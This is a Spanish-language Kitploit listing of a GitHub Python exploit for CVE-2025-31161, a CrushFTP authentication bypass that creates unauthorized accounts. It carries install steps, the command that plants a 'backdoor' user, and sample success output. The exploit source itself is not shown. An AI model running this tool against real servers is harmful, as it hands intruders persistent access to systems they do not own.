Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-31161 — 🛡️ CVE-2025-31161 - Exploit de Omisión de Autenticación en Creación de Usuarios de CrushFTP | Kitploit
Herramientas/GitHubGitHub/0xgh057r3c0n/cve-2025-31161
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHub0xgh057r3c0n/cve-2025-31161

CVE-2025-31161

🛡️ CVE-2025-31161 - Exploit de Omisión de Autenticación en Creación de Usuarios de CrushFTP

Ver Repositorio
53hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-31161 - Exploit de omisión de autenticación en creación de usuario de CrushFTP

CrushFTP Logo

📌 Descripción

Este exploit de Python ataca servidores CrushFTP vulnerables a CVE-2025-31161. La vulnerabilidad permite la creación de cuentas de usuario no autenticadas mediante el envío de un payload XML manipulado a la WebInterface, lo que potencialmente resulta en un compromiso completo del servidor.


⚠️ Descargo de responsabilidad

Esta herramienta está destinada únicamente a pruebas de seguridad educativas y autorizadas.
El uso no autorizado contra sistemas que no poseas o para los que no tengas permiso explícito es ilegal y no ético.


🧰 Requisitos

  • Python 3
  • pip3
  • Módulos de Python:
    • requests
    • colorama

✅ Instalar Python3 y pip3

Debian/Ubuntu:

root@kitploit:~
sudo apt update
sudo apt install python3 python3-pip -y

CentOS/RHEL:

root@kitploit:~
sudo yum install python3 python3-pip -y

macOS (con Homebrew):

root@kitploit:~
brew install python3

✅ Instalar dependencias de Python

root@kitploit:~
pip3 install requests colorama

🔧 Uso

root@kitploit:~
python3 CVE-2025-31161.py --target_host <TARGET_IP> [--port <PORT>] [--target_user <ADMIN>] [--new_user <USERNAME>] [--password <PASSWORD>]

🔍 Ejemplo

root@kitploit:~
python3 CVE-2025-31161.py --target_host 192.168.1.100 --new_user backdoor --password P@ssw0rd!

🧪 Opciones de línea de comandos


🖥️ Salida de ejemplo

root@kitploit:~
[+] Preparing Payloads
  [-] Warming up the target...
  [-] Target is up and running
[+] Sending Account Create Request
  [!] User created successfully!

[+] Exploit Complete! You can now login with:
   [*] Username: AuthBypassAccount
   [*] Password: CorrectHorseBatteryStaple

👨‍💻 Autor

Gaurav Bhattacharjee (G4UR4V007)


📄 Licencia

Este proyecto está licenciado bajo la Licencia MIT.

Descargar herramienta
ArgumentoDescripciónValor predeterminado
--target_host(Requerido) IP o dominio del objetivo—
--portPuerto de la WebInterface de CrushFTP8080
--target_userNombre de usuario administrador (usado en el payload)crushadmin
--new_userNombre de usuario para la nueva cuenta no autorizadaAuthBypassAccount
--passwordContraseña para el nuevo usuarioCorrectHorseBatteryStaple